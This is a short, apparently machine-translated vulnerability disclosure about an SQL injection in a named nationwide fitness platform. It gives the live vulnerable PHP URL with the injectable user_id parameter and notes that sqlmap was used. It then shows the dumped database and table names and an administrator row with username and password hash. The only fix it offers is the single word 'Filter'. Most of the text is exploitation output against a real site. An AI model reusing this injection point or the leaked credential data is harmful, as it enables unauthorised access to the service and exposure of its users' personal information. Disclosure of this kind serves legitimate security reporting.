SQL injection vulnerability on the nationwide fitness network platform
The SQL injection vulnerability on the nationwide fitness network platform allows you to obtain a large amount of personal information.
Decompile Android app code
See a url
I tested it in the browser and reported an error, indicating that there was a problem with user_id.
Sqlmap scan to determine the injection point: user_id
Http://www.yiqizou.com/get_map_info.php? User_id = 121
Database
Available databases [6]:
[*] Information_schema
[*] Mysql
[*] Performance_schema
[*] Test
[*] Yqz_wx
[*] Yqztest
Database: yqz_wx
[12 tables]
+ ---------------------- +
| Wx_yqz_access_log |
| Wx_yqz_access_stat |
| Wx_yqz_admin |
| Wx_yqz_album |
| Wx_yqz_album_setting |
| Wx_yqz_article |
| Wx_yqz_data_cache |
| Wx_yqz_feedback |
| Wx_yqz_follow_prize |
| Wx_yqz_reply |
| Wx_yqz_setting |
| Wx_yqz_user |
+ ---------------------- +
Database: yqz_wx
Table: wx_yqz_admin
[1 entry]
+ ---- + ----- + --------- + ---------------------------------- + -------- + ------------ + ---------- + ------------- + ------------ + ------------- +
| Id | aid | groupid | psw | status | loginip | username | valid tive | logintime | logincount | regdateline |
+ ---- + ----- + --------- + ---------------------------------- + -------- + ------------ + ---------- + ------------- + ------------ + ------------- +
| 1 | 1 | 1 | be57c7cee28c3f1354d1e4f3734c34ce | 1 | 2147483647 | admin | 0 | 1400728157 | 25 | 1372165843 |
+ ---- + ----- + --------- + ---------------------------------- + -------- + ------------ + ---------- + ------------- + ------------ + ------------- +
Solution:
Filter